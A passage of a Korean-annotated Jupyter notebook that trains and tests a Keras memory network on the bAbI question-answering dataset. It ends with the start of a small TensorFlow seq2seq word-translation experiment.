concatenate_1[0][0] \n__________________________________________________________________________________________________\ndropout_5 (Dropout) (None, 32) 0 lstm_1[0][0] \n__________________________________________________________________________________________________\ndense_1 (Dense) (None, 38) 1254 dropout_5[0][0] \n__________________________________________________________________________________________________\nactivation_2 (Activation) (None, 38) 0 dense_1[0][0] \n__________________________________________________________________________________________________\ndropout_6 (Dropout) (None, 38) 0 activation_2[0][0] \n__________________________________________________________________________________________________\ndense_2 (Dense) (None, 38) 1482 dropout_6[0][0] \n__________________________________________________________________________________________________\nactivation_3 (Activation) (None, 38) 0 dense_2[0][0] \n__________________________________________________________________________________________________\nactivation_4 (Activation) (None, 38) 0 activation_3[0][0] \n__________________________________________________________________________________________________\nactivation_5 (Activation) (None, 38) 0 activation_4[0][0] \n==================================================================================================\nTotal params: 40,212\nTrainable params: 40,212\nNon-trainable params: 0\n__________________________________________________________________________________________________\n" ] ], [ [ "With these two lines we build the final model, and compile it, that is, define all the maths that will be going on in the background by specifying an optimiser, a loss function and a metric to optimise.\n\nNow its time to train the model, here we need to define the inputs to the training, (the input stories, questions and answers), the batch size that we will be feeding the model with (that is, how many inputs at once), and the number of epochs that we will train the model for (that is, how many times the model will go through the training data in order to update the weights). I used 1000 epochs and obtained an accuracy of 98%, but even with 100 to 200 epochs you should get some pretty good results.\n\nNote that depending on your hardware, this training might take a while. Just relax, sit back, keep reading Medium and wait until its done.\n\nAfter its completed the training you might be left wondering “am I going to have to wait this long every time I want to use the model?” the obvious answer my friend is, NO. Keras allows developers to save a certain model it has trained, with the weights and all the configurations. The following block of code shows how this is done.", "_____no_output_____" ], [ "## +++++++++++++++++++++++++++++", "_____no_output_____" ] ], [ [ "print( answers_train.shape )\nanswers_train[0]", "(10000, 38)\n" ], [ "val=model.evaluate( [inputs_train, questions_train], answers_train, \n batch_size = 32)\nprint(val)\n\n# 길이가 38인 곳으로 랜덤하게 가기에, 확률적으로 1/38\n#####################################################", "10000/10000 [==============================] - 1s 104us/step\n[3.637576064300537, 0.0]\n" ], [ "my_story = 'Sandra picked up the milk . Mary travelled left . '\nmy_question = 'Sandra got the milk ?'\n\nmy_data = [(my_story.split(), my_question.split(),'yes')]\nmy_story, my_ques, my_ans = vectorize_stories(my_data)\n\npred_results = model.predict(([my_story,my_ques]))\nval_max = np.argmax(pred_results[0])\n\nprint(pred_results[0][val_max])\n \n# 맟출 확률이 1/38\n##################", "0.026316524\n" ] ], [ [ "# +++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n\n\n\n# 여기의 숫자 ? 확률적으로 !", "_____no_output_____" ], [ "# 깡통인 모델에 이미 학습한 것을 주입하자\n\n\n\n모델 학습과정 설정하기\n\n 학습하기 전에 학습에 대한 설정을 수행합니다.\n 손실 함수 및 최적화 방법을 정의합니다.\n 케라스에서는 compile() 함수를 사용합니다.\n \n모델 학습시키기\n\n 훈련셋을 이용하여 구성한 모델로 학습시킵니다.\n 케라스에서는 fit() 함수를 사용합니다.\n \n학습과정 살펴보기\n\n 모델 학습 시 훈련셋, 검증셋의 손실 및 정확도를 측정합니다.\n 반복횟수에 따른 손실 및 정확도 추이를 보면서 학습 상황을 판단합니다.\n \n모델 평가하기\n\n 준비된 시험셋으로 학습한 모델을 평가합니다.\n 케라스에서는 evaluate() 함수를 사용합니다.\n \n모델 사용하기\n\n 임의의 입력으로 모델의 출력을 얻습니다.\n 케라스에서는 predict() 함수를 사용합니다.", "_____no_output_____" ], [ "# 공부한 AI 두뇌 model 을 불러온다.", "_____no_output_____" ] ], [ [ "del model\n##################################################\n#To load a model that we have already trained and saved:\n# batch_size=32 , epochs=350 이상 훈련시킨 모델 부름 \n\n\n\nfrom keras.models import load_model\n\n\n# returns a compiled model\n# identical to the previous one\n\n##################################################\n##################################################\n\nmodel = load_model('./data_out/babi_chatbot_50.h5')\n\n###################################################\n###################################################", "C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\framework\\indexed_slices.py:424: UserWarning: Converting sparse IndexedSlices to a dense Tensor of unknown shape. This may consume a large amount of memory.\n \"Converting sparse IndexedSlices to a dense Tensor of unknown shape. \"\n" ] ], [ [ "# ===============================\n\n\n# 더 공부를 시키자 !!\n\n# 공부한 것을 저장시키자 !!\n\n<p> &nbsp;", "_____no_output_____" ], [ "\n\n## Training and testing the model\n\n## Saving the model +++++++++++\n\n## 학습 평가를 Matplotlib 그래프로 표현", "_____no_output_____" ] ], [ [ "\"\"\"\nimport keras.callbacks import EarlyStopping\n\nearly_stopping_callback = EarlyStopping( monitor='val_loss', patience=100)\n\nhistory = model.fit([inputs_train,questions_train],answers_train, \n batch_size = 32, epochs = 150, \n validation_data = ([inputs_test,questions_test],answers_test),\n callbacks=[early_stopping_callback] )\n\"\"\"\n# 위의 코드는 학습데이터 정확도는 up, 테스트 데이터 정확도가 정체된 오버휫팅때 스탑시킴\n######################################################################################\n\n\n\nhistory = model.fit([inputs_train,questions_train],answers_train, \n batch_size = 32, epochs = 5, \n validation_data = ([inputs_test,questions_test],answers_test) )\n\nval=model.evaluate( [inputs_train,questions_train], answers_train, \n batch_size = 32)\n\n\nprint(val)\n\n\n######################################\n\n\nfilename = './data_out/babi_chatbot.h5'\n\nmodel.save(filename)\n\n\n# 길이가 38인 곳으로 랜덤하게 가기에, 확률적으로 1/38\n\n\n########################################\n\n# model.fit 안하면 history 없어서 ==> 에러 \n# NameError: name 'history' is not defined\n\n\n#Lets plot the increase of accuracy as we increase the number of training epochs\n#We can see that without any training the acc is about 50%, random guessing\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\nprint(history.history.keys())\n# summarize history for accuracy\n\nplt.figure(figsize=(12,12))\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n", "Train on 10000 samples, validate on 1000 samples\nEpoch 1/5\n10000/10000 [==============================] - 5s 481us/step - loss: 2.4825 - accuracy: 0.4756 - val_loss: 0.6502 - val_accuracy: 0.6070\nEpoch 2/5\n10000/10000 [==============================] - 4s 392us/step - loss: 0.6337 - accuracy: 0.6368 - val_loss: 0.5686 - val_accuracy: 0.6950\nEpoch 3/5\n10000/10000 [==============================] - 4s 400us/step - loss: 0.5334 - accuracy: 0.7335 - val_loss: 0.4622 - val_accuracy: 0.7970\nEpoch 4/5\n10000/10000 [==============================] - 4s 394us/step - loss: 0.4368 - accuracy: 0.8091 - val_loss: 0.4093 - val_accuracy: 0.8230\nEpoch 5/5\n10000/10000 [==============================] - 4s 379us/step - loss: 0.4026 - accuracy: 0.8313 - val_loss: 0.4117 - val_accuracy: 0.8350\n10000/10000 [==============================] - 1s 90us/step\n[0.34663112587928774, 0.8614000082015991]\ndict_keys(['val_loss', 'val_accuracy', 'loss', 'accuracy'])\n" ] ], [ [ "# batch_size = 32 와 epochs=50 의 시작\n\nTrain on 10000 samples, validate on 1000 samples\n\nEpoch 1/50\n 10000/10000 [==============================] - 7s 686us/step - loss: 0.8794 - accuracy: 0.5036 - val_loss: 0.6941 - val_accuracy: 0.5030\n\nEpoch 2/50\n 10000/10000 [==============================] - 6s 570us/step - loss: 0.7019 - accuracy: 0.4998 - val_loss: 0.6937 - val_accuracy: 0.4970\n\n\n\n# batch_size = 64 와 epochs=50 의 끝\n\nEpoch 48/50\n 10000/10000 [==============================] - 5s 530us/step - loss: 0.3619 - accuracy: 0.8410 - val_loss: 0.4453 - val_accuracy: 0.7980\n\nEpoch 49/50\n 10000/10000 [==============================] - 5s 542us/step - loss: 0.3586 - accuracy: 0.8406 - val_loss: 0.4490 - val_accuracy: 0.7950\n\nEpoch 50/50\n 10000/10000 [==============================] - 5s 547us/step - loss: 0.3553 - accuracy: 0.8424 - val_loss: 0.4508 - val_accuracy: 0.8030\n\n\n\n=\n=\n=\n=\n\n# batch_size = 32 에 epochs=50 결과\n\n\n![title](images/babi_train_start.png)\n\n# batch_size = 32 에 epochs=100 결과\n\n![title](images/babi_train.png)\n\n\n", "_____no_output_____" ], [ "## [문제] 학습데이터의 정확도는 높아지는데, 테스트 데이터는 정지됨 !!\n\n### 과적합 over-fitting의 개념을 이해하고, 테스트 데이터 정확도를 높이는 방법을 탐구 !\n\n<p>\n \n### 1. 일만개의 학습데이터와 천개의 테스크 데이터로 나뉘어 있다. 데이터를 일만천개로 바꾸어, \n### 돌아가며 k-fold cross validation 하는 방법을 알아보라 (데이터의 양이 적은 경우에 필요)\n \n<p>\n \n### 2. Keras 모델의 한계일 수 있다. Hidden layer 갯수나 딥러닝 알고리즘을 바꾸어 학습을 시킨다, \n### 인터넷 등에서 새로운 여러가지 딥러닝 알고리즘을 알아보고, 이를 Babi 에 적용한다.\n ", "_____no_output_____" ], [ "## 현재의 딥러닝 모델 \n<pre>\nModel: \"model_1\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) (None, 156) 0 \n__________________________________________________________________________________________________\ninput_2 (InputLayer) (None, 6) 0 \n__________________________________________________________________________________________________\nsequential_1 (Sequential) multiple 2432 input_1[0][0] \n__________________________________________________________________________________________________\nsequential_3 (Sequential) (None, 6, 64) 2432 input_2[0][0] \n__________________________________________________________________________________________________\ndot_1 (Dot) (None, 156, 6) 0 sequential_1[1][0] \n sequential_3[1][0] \n__________________________________________________________________________________________________\nactivation_1 (Activation) (None, 156, 6) 0 dot_1[0][0] \n__________________________________________________________________________________________________\nsequential_2 (Sequential) multiple 228 input_1[0][0] \n__________________________________________________________________________________________________\nadd_1 (Add) (None, 156, 6) 0 activation_1[0][0] \n sequential_2[1][0] \n__________________________________________________________________________________________________\npermute_1 (Permute) (None, 6, 156) 0 add_1[0][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 6, 220) 0 permute_1[0][0] \n sequential_3[1][0] \n__________________________________________________________________________________________________\nlstm_1 (LSTM) (None, 32) 32384 concatenate_1[0][0] \n__________________________________________________________________________________________________\ndropout_4 (Dropout) (None, 32) 0 lstm_1[0][0] \n__________________________________________________________________________________________________\ndense_1 (Dense) (None, 38) 1254 dropout_4[0][0] \n__________________________________________________________________________________________________\nactivation_2 (Activation) (None, 38) 0 dense_1[0][0] \n==================================================================================================\nTotal params: 38,730\nTrainable params: 38,730\nNon-trainable params: 0\n__________________________________________________________________________________________________\n</pre>\n\n\n", "_____no_output_____" ], [ "## ==========================================\n\n# 학습된 AI 두뇌 모델 evaluate !!!! \n\n\n# ===================================", "_____no_output_____" ] ], [ [ "# model.compile(optimizer='rmsprop', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n# print( answers_train.shape ) ==> ( 10000, 38 ) one hot vector\n\n### train 에 대해서 evaluate 한다 //////// test 데이터로 하는 것과 차이 ?? ///////\n\nval=model.evaluate( [inputs_train,questions_train], answers_train, batch_size = 32)\n\n###################################################################################\n\n\nval \n\n# 50 때 0.88", "10000/10000 [==============================] - 1s 94us/step\n" ] ], [ [ "## ==========================================\n\n# 학습된 AI 두뇌 테스트를 위해 문제를 출제 !!!! \n\n\n# ====================================", "_____no_output_____" ] ], [ [ "#Lets check out the predictions on the test set:\n#These are just probabilities for every single word on the vocab\n# 테스트 데이터 기반의 prediction ##############################\n\n\npred_results = model.predict(([inputs_test,questions_test]))\n\nprint( pred_results )", "[[5.3464513e-09 4.7893756e-09 5.9277316e-09 ... 5.8098868e-09\n 6.7517063e-09 5.7777618e-09]\n [1.1304347e-08 9.6045669e-09 1.1915859e-08 ... 1.1772948e-08\n 1.3240343e-08 1.3179218e-08]\n [4.7399933e-08 3.1272307e-08 4.0516948e-08 ... 4.2989544e-08\n 4.5466496e-08 4.3368548e-08]\n ...\n [2.2156049e-08 1.7657909e-08 2.2862498e-08 ... 2.3986395e-08\n 2.4334682e-08 2.7791978e-08]\n [5.1913876e-08 3.6524860e-08 4.4735319e-08 ... 4.9788913e-08\n 5.2742969e-08 4.8548156e-08]\n [5.2890915e-08 3.6501500e-08 5.2736290e-08 ... 5.5532698e-08\n 5.7155237e-08 6.0597074e-08]]\n" ] ], [ [ "These results are an array, as mentioned earlier that contain in every position the probabilities of each of the words in the vocabulary being the answer to the question. If we look at the first element of this array, we will see a vector of the size of the vocabulary, where all the times are close to 0 except the ones corresponding to yes or no.\n\nOut of these, if we pick the index of the highest value of the array and then see to which word it corresponds to, we should find out if the answer is affirmative or negative.\n\nOne fun thing that we can do now, is create our own stories and questions, and feed them to the bot to see what he says!", "_____no_output_____" ] ], [ [ "my_story = 'Sandra picked up the milk . Mary travelled left . '\nmy_question = 'Sandra got the milk ?'\n\nmy_data = [(my_story.split(), my_question.split(),'yes')]\nmy_story, my_ques, my_ans = vectorize_stories(my_data)\n\npred_results = model.predict(([my_story,my_ques]))\nval_max = np.argmax(pred_results[0])\n\nprint(pred_results[0][val_max])\n \n# 맟출 확률이 1/38\n# 50 에서는 0.579\n# 100 dptj 0.69\n# 150 에서 0.54", "0.9167208\n" ], [ "#These are the probabilities for the vocab words using the 1st sentence\n\n\npred_results[0]", "_____no_output_____" ], [ "val_max = np.argmax(pred_results[0])", "_____no_output_____" ], [ "for key,val in tokenizer.word_index.items():\n if val == val_max:\n k = key\nprint(k)", "no\n" ], [ "#See probability:\n\npred_results[0][val_max]", "_____no_output_____" ] ], [ [ "# ================================", "_____no_output_____" ] ], [ [ "#Now, we can make our own questions using the vocabulary we have\n\nprint( len(vocab) )\nvocab\n\n# 'office': 1\n# '?': 37 == 마지막 index", "37\n" ], [ "my_story = 'Sandra picked up the milk . Mary travelled left . '", "_____no_output_____" ], [ "my_story.split()", "_____no_output_____" ] ], [ [ " my_story = 'Sandra picked up the milk . Mary travelled left . '\n my_question = 'Sandra got the milk ?'\n my_data = [(my_story.split(), my_question.split(),'yes')]\n my_story, my_ques, my_ans = vectorize_stories(my_data)\n pred_results = model.predict(([my_story,my_ques]))\n val_max = np.argmax(pred_results[0])\n print(pred_results[0][val_max])", "_____no_output_____" ] ], [ [ "my_question = 'Sandra got the milk ?'", "_____no_output_____" ], [ "my_question.split()", "_____no_output_____" ], [ "#Put the data in the same format as before\nmy_data = [(my_story.split(), my_question.split(),'yes')]", "_____no_output_____" ], [ "#Vectorize this data\nmy_story, my_ques, my_ans = vectorize_stories(my_data)", "_____no_output_____" ], [ "#Make the prediction\n\npred_results = model.predict(([my_story,my_ques]))\n\nprint( pred_results.shape )\nprint( 'yes : ', pred_results[0][26] )\nprint( 'no : ', pred_results[0][37] )\nprint( pred_results[0][26]/ pred_results[0][37] )\n\n# 50 일때 yes / no = 0.986 거의 같은 확률 0", "(1, 38)\nyes : 1.633283e-09\nno : 2.412464e-09\n0.6770186\n" ] ], [ [ " 'yes': 24,\n 'left': 25,\n 'to': 26,\n 'milk': 27,\n 'in': 28,\n 'moved': 29,\n 'discarded': 30,\n \n 'no': 31,", "_____no_output_____" ] ], [ [ "val_max = np.argmax(pred_results[0])\nprint( val_max )\n", "31\n" ], [ "#Correct prediction!\n\nfor key,val in tokenizer.word_index.items():\n if val == val_max:\n k = key\n \nprint(val)\nprint(k)", "37\nno\n" ], [ "#Confidence\npred_results[0][val_max]", "_____no_output_____" ] ], [ [ "# ====================================\n", "_____no_output_____" ] ], [ [ "my_story = 'Sandra picked up the milk . Sandra moved to the bathroom . '\nmy_question = 'Is the milk in the bathroom ?'\nmy_data = [(my_story.split(), my_question.split(),'yes')]\nmy_story, my_ques, my_ans = vectorize_stories(my_data)\npred_results = model.predict(([my_story,my_ques]))\nval_max = np.argmax(pred_results[0])\n\nprint(pred_results[0][val_max])\n###############################\n# 50 에서는 0.9748\n# 100 에서는 0.974858\n# 150 에서 0.6165\n\nmodel.evaluate([inputs_train,questions_train],answers_train, \n batch_size = 32)\n", "0.8649988\n10000/10000 [==============================] - 1s 90us/step\n" ], [ "val_max = np.argmax(pred_results[0])\nprint( val_max )\n\n#Correct prediction!\n\nfor key,val in tokenizer.word_index.items():\n if val == val_max:\n k = key\n \nprint(val)\nprint(k)", "29\n37\nyes\n" ] ], [ [ "# ====================================\n\n<p> &nbsp;\n\n \n한 장에 모아쓴 코드", "_____no_output_____" ] ], [ [ "import keras\nfrom keras.models import Sequential, Model\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import Permute, dot, add, concatenate\nfrom keras.layers import LSTM, Dense, Dropout, Input, Activation\nfrom keras.utils.data_utils import get_file\nfrom keras.preprocessing.sequence import pad_sequences\n\nfrom functools import reduce\nimport tarfile\nimport numpy as np\nimport re\n\nimport IPython\nimport matplotlib.pyplot as plt\nimport pandas as pd\n%matplotlib inline\n\ndef tokenize(sent):\n return [ x.strip() for x in re.split('(\\W+)+', sent) if x.strip()]\n\ndef parse_stories(lines):\n '''Parse stories provided in the bAbi tasks format\n '''\n data = []\n story = []\n for line in lines:\n line = line.decode('utf-8').strip()\n nid, line = line.split(' ', 1)\n nid = int(nid)\n if nid == 1:\n story = []\n if '\\t' in line:\n q, a, supporting = line.split('\\t')\n q = tokenize(q)\n # Provide all the substories\n substory = [x for x in story if x]\n data.append((substory, q, a))\n story.append('')\n else:\n sent = tokenize(line)\n story.append(sent)\n return data\n\n\ndef get_stories(f):\n data = parse_stories(f.readlines())\n flatten = lambda data: reduce(lambda x, y: x + y, data)\n data = [(flatten(story), q, answer) for story, q, answer in data]\n return data\n\ndef vectorize_stories(data, word_idx, story_maxlen, query_maxlen):\n X = []\n Xq = []\n Y = []\n for story, query, answer in data:\n x = [word_idx[w] for w in story]\n xq = [word_idx[w] for w in query]\n # let's not forget that index 0 is reserved\n y = np.zeros(len(word_idx) + 1)\n y[word_idx[answer]] = 1\n X.append(x)\n Xq.append(xq)\n Y.append(y)\n return (pad_sequences(X, maxlen=story_maxlen),\n pad_sequences(Xq, maxlen=query_maxlen), np.array(Y))\n\n\nclass TrainingVisualizer(keras.callbacks.History):\n def on_epoch_end(self, epoch, logs={}):\n super().on_epoch_end(epoch, logs)\n IPython.display.clear_output(wait=True)\n pd.DataFrame({key: value for key, value in self.history.items() if key.endswith('loss')}).plot()\n axes = pd.DataFrame({key: value for key, value in self.history.items() if key.endswith('acc')}).plot()\n axes.set_ylim([0, 1])\n plt.show() \n", "_____no_output_____" ], [ "try:\n path = get_file('babi-tasks-v1-2.tar.gz', origin='https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz')\nexcept:\n print('Error downloading dataset, please download it manually:\\n'\n '$ wget http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz\\n'\n '$ mv tasks_1-20_v1-2.tar.gz ~/.keras/datasets/babi-tasks-v1-2.tar.gz')\n raise\ntar = tarfile.open(path)\n\n\nchallenge = 'tasks_1-20_v1-2/en-10k/qa1_single-supporting-fact_{}.txt'\n\nprint('Extracting stories for the challenge: single_supporting_fact_10k')\ntrain_stories = get_stories(tar.extractfile(challenge.format('train')))\ntest_stories = get_stories(tar.extractfile(challenge.format('test')))\n\nprint( len(train_stories), len(test_stories) )\nprint('Number of training stories:', len(train_stories))\nprint('Number of test stories:', len(test_stories))\nprint( train_stories[0] )\n\nvocab = set()\nfor story, q, answer in train_stories + test_stories:\n vocab |= set(story + q + [answer])\nvocab = sorted(vocab)\n\n# Reserve 0 for masking via pad_sequences\nvocab_size = len(vocab) + 1\nstory_maxlen = max(map(len, (x for x, _, _ in train_stories + test_stories)))\nquery_maxlen = max(map(len, (x for _, x, _ in train_stories + test_stories)))\n\n\nword_idx = dict((c, i + 1) for i, c in enumerate(vocab))\nidx_word = dict((i+1, c) for i,c in enumerate(vocab))\ninputs_train, queries_train, answers_train = vectorize_stories(train_stories,\n word_idx,\n story_maxlen,\n query_maxlen)\ninputs_test, queries_test, answers_test = vectorize_stories(test_stories,\n word_idx,\n story_maxlen,\n \n \nprint('-------------------------')\nprint('Vocabulary:\\n',vocab,\"\\n\")\nprint('Vocab size:', vocab_size, 'unique words')\nprint('Story max length:', story_maxlen, 'words')\nprint('Query max length:', query_maxlen, 'words')\nprint('Number of training stories:', len(train_stories))\nprint('Number of test stories:', len(test_stories))\nprint('-------------------------')\n \nprint('-------------------------')\nprint('inputs: integer tensor of shape (samples, max_length)')\nprint('inputs_train shape:', inputs_train.shape)\nprint('inputs_test shape:', inputs_test.shape)\nprint('input train sample', inputs_train[0,:])\nprint('-------------------------')\n \nprint('-------------------------') \nprint('queries: integer tensor of shape (samples, max_length)') \nprint('queries_train shape:', queries_train.shape) \nprint('queries_test shape:', queries_test.shape) \nprint('query train sample', queries_train[0,:]) \n\n \nprint('-------------------------') \nprint('answers: binary (1 or 0) tensor of shape (samples, vocab_size)') \nprint('answers_train shape:', answers_train.shape) \nprint('answers_test shape:', answers_test.shape) \nprint('answer train sample', answers_train[0,:]) \nprint('-------------------------')\n \n \n \n ", "_____no_output_____" ], [ "train_epochs = 100\nbatch_size = 32\nlstm_size = 64\nembed_size = 50\ndropout_rate = 0.3\n\n\n# placeholders\ninput_sequence = Input((story_maxlen,))\nquestion = Input((query_maxlen,))\n\nprint('Input sequence:', input_sequence)\nprint('Question:', question)\n\n# encoders\n# embed the input sequence into a sequence of vectors\ninput_encoder_m = Sequential()\ninput_encoder_m.add(Embedding(input_dim=vocab_size,\n output_dim=embed_size))\ninput_encoder_m.add(Dropout(dropout_rate))\n# output: (samples, story_maxlen, embedding_dim)\n\n# embed the input into a sequence of vectors of size query_maxlen\ninput_encoder_c = Sequential()\ninput_encoder_c.add(Embedding(input_dim=vocab_size,\n output_dim=query_maxlen))\ninput_encoder_c.add(Dropout(dropout_rate))\n# output: (samples, story_maxlen, query_maxlen)\n\n# embed the question into a sequence of vectors\nquestion_encoder = Sequential()\nquestion_encoder.add(Embedding(input_dim=vocab_size,\n output_dim=embed_size,\n input_length=query_maxlen))\nquestion_encoder.add(Dropout(dropout_rate))\n# output: (samples, query_maxlen, embedding_dim)\n\n# encode input sequence and questions (which are indices)\n# to sequences of dense vectors\ninput_encoded_m = input_encoder_m(input_sequence)\nprint('Input encoded m', input_encoded_m)\ninput_encoded_c = input_encoder_c(input_sequence)\nprint('Input encoded c', input_encoded_c)\nquestion_encoded = question_encoder(question)\nprint('Question encoded', question_encoded)\n\n\n# compute a 'match' between the first input vector sequence\n# and the question vector sequence\n# shape: `(samples, story_maxlen, query_maxlen)\nmatch = dot([input_encoded_m, question_encoded], axes=-1, normalize=False)\nprint(match.shape)\nmatch = Activation('softmax')(match)\nprint('Match shape', match.shape)\n\n# add the match matrix with the second input vector sequence\nresponse = add([match, input_encoded_c]) # (samples, story_maxlen, query_maxlen)\nresponse = Permute((2, 1))(response) # (samples, query_maxlen, story_maxlen)\nprint('Response shape', response)\n\n# concatenate the response vector with the question vector sequence\nanswer = concatenate([response, question_encoded])\nprint('Answer shape', answer)\n\nanswer = LSTM(lstm_size)(answer) # Generate tensors of shape 32\nanswer = Dropout(dropout_rate)(answer)\nanswer = Dense(vocab_size)(answer) # (samples, vocab_size)\n# we output a probability distribution over the vocabulary\nanswer = Activation('softmax')(answer)\n\n# build the final model\nmodel = Model([input_sequence, question], answer)\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.summary()\n\nmodel.fit([inputs_train, queries_train], answers_train, batch_size, train_epochs, callbacks=[TrainingVisualizer()],\n validation_data=([inputs_test, queries_test], answers_test))\n\nmodel.save('model.h5')\n\n\nfor i in range(0,10):\n current_inp = test_stories[i]\n current_story, current_query, current_answer = vectorize_stories([current_inp], word_idx, story_maxlen, query_maxlen)\n current_prediction = model.predict([current_story, current_query])\n current_prediction = idx_word[np.argmax(current_prediction)]\n print(' '.join(current_inp[0]), ' '.join(current_inp[1]), '| Prediction:', current_prediction, '| Ground Truth:', current_inp[2])\n print(\"-----------------------------------------------------------------------------------------\")\n ", "_____no_output_____" ], [ "# print('-------------------------------------------------------------------------------------------')\n# print('Custom User Queries (Make sure there are spaces before each word)')\n# while 1:\n# print('-------------------------------------------------------------------------------------------')\n# print('Please input a story')\n# user_story_inp = input().split(' ')\n# print('Please input a query')\n# user_query_inp = input().split(' ')\n# user_story, user_query, user_ans = vectorize_stories([[user_story_inp, user_query_inp, '.']], word_idx, story_maxlen, query_maxlen)\n# user_prediction = model.predict([user_story, user_query])\n# user_prediction = idx_word[np.argmax(user_prediction)]\n# print('Result')\n# print(' '.join(user_story_inp), ' '.join(user_query_inp), '| Prediction:', user_prediction)\n\n# Mary went to the bathroom . John moved to the hallway . Mary travelled to the office . # Where is Mary ?\n# Sandra travelled to the office . John journeyed to the garden .", "_____no_output_____" ] ], [ [ "# ====================================\n\n<p> &nbsp;\n\n# [생각] 영어 데이터를 한글 번역기로 번역을 시킨다.\n\n<p> &nbsp;\n \n# [생각] 한글용 Babi 데이터로 한글 QA 만들어본다.\n\n<p> &nbsp;\n \n# [생각] 수학학습 질문과 답변 데이터로 만들어본다.\n\n<p> &nbsp;", "_____no_output_____" ], [ "# web 버젼, attention 버젼\n\n\n# https://github.com/vinhkhuc/MemN2N-babi-python", "_____no_output_____" ], [ "# ++++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n\n# sequence 2 sequence 실험 \n\n<p> &nbsp;", "_____no_output_____" ], [ "![title](images/seq2seq.png)", "_____no_output_____" ] ], [ [ "import tensorflow.compat.v1 as tf\ntf.disable_eager_execution()\n\nimport numpy as np\n\nchar_arr = [c for c in \"SEPabcdefghijklmnopqrstuvwxyz단어나무놀이소녀키스사랑봉구우루\"]\nnum_dic = {n: i for i, n in enumerate(char_arr)}\ndic_len = len(num_dic)\n\nseq_data = [['word', \"단어\"], [\"wood\", \"나무\"], [\"game\", \"놀이\"], [\"girl\", \"소녀\"], \n [\"kiss\", \"키스\"], [\"love\", \"사랑\"], [\"bong\", \"봉구\"], [\"uruu\", \"우루\"]]", "_____no_output_____" ], [ "def make_batch(seq_data):\n input_batch = []\n output_batch = []\n target_batch = []\n \n for seq in seq_data:\n input = [num_dic[n] for n in seq[0]]\n output = [num_dic[n] for n in (\"S\" + seq[1])]\n target = [num_dic[n] for n in (seq[1] + \"E\")]\n \n input_batch.append(np.eye(dic_len)[input])\n output_batch.append(np.eye(dic_len)[output])\n target_batch.append(target)\n \n return input_batch, output_batch, target_batch", "_____no_output_____" ], [ "learning_rate = 0.001\nn_hidden = 128\ntotal_epoch = 1000\n\nn_class = n_input = dic_len\n\nenc_input = tf.placeholder(tf.float32, [None, None, n_input])\ndec_input = tf.placeholder(tf.float32, [None, None, n_input])\ntargets = tf.placeholder(tf.int64, [None, None])\n\n\n# encoder: [batch size, time steps, input size]\n# decoder: [batch size, time steps]\n\nwith tf.variable_scope(\"encode\"):\n enc_cell = tf.nn.rnn_cell.BasicRNNCell(n_hidden)\n enc_cell = tf.nn.rnn_cell.DropoutWrapper(enc_cell, output_keep_prob=0.5)\n \n outputs, enc_states = tf.nn.dynamic_rnn(enc_cell, enc_input, dtype=tf.float32)\n \nwith tf.variable_scope(\"decode\"):\n dec_cell = tf.nn.rnn_cell.BasicRNNCell(n_hidden)\n dec_cell = tf.nn.rnn_cell.DropoutWrapper(enc_cell, output_keep_prob=0.5)\n \n outputs, dec_stats = tf.nn.dynamic_rnn(dec_cell, dec_input, \n initial_state=enc_states, dtype=tf.float32)\n", "WARNING:tensorflow:From <ipython-input-6-8ef07e5ed546>:16: BasicRNNCell.__init__ (from tensorflow.python.ops.rnn_cell_impl) is deprecated and will be removed in a future version.\nInstructions for updating:\nThis class is equivalent as tf.keras.layers.SimpleRNNCell, and will be replaced by that in Tensorflow 2.0.\nWARNING:tensorflow:From <ipython-input-6-8ef07e5ed546>:19: dynamic_rnn (from tensorflow.python.ops.rnn) is deprecated and will be removed in a future version.\nInstructions for updating:\nPlease use `keras.layers.RNN(cell)`, which is equivalent to this API\nWARNING:tensorflow:From C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\ops\\rnn_cell_impl.py:456: Layer.add_variable (from tensorflow.python.keras.engine.base_layer) is deprecated and will be removed in a future version.\nInstructions for updating:\nPlease use `layer.add_weight` method instead.\nWARNING:tensorflow:From C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\ops\\resource_variable_ops.py:1630: calling BaseResourceVariable.__init__ (from tensorflow.python.ops.resource_variable_ops) with constraint is deprecated and will be removed in a future version.\nInstructions for updating:\nIf using Keras pass *_constraint arguments to layers.\nWARNING:tensorflow:From C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\ops\\rnn_cell_impl.py:460: calling Zeros.__init__ (from tensorflow.python.ops.init_ops) with dtype is deprecated and will be removed in a future version.\nInstructions for updating:\nCall initializer instance with the dtype argument instead of passing it to the constructor\n" ], [ "model = tf.layers.dense(outputs, n_class, activation=None)\ncost = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits=model, labels=targets\n )\n)\nopt = tf.train.AdamOptimizer(learning_rate).minimize(cost)", "WARNING:tensorflow:From <ipython-input-7-e5334240e8e5>:1: dense (from tensorflow.python.layers.core) is deprecated and will be removed in a future version.\nInstructions for updating:\nUse keras.layers.Dense instead.\nWARNING:tensorflow:From C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\layers\\core.py:187: Layer.apply (from tensorflow.python.keras.engine.base_layer) is deprecated and will be removed in a future version.\nInstructions for updating:\nPlease use `layer.__call__` method instead.\n" ], [ "init = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\ninput_batch, output_batch, target_batch = make_batch(seq_data)\n\ncost_val = []\nfor epoch in range(total_epoch):\n _, loss = sess.run([opt, cost], feed_dict={enc_input: input_batch,\n 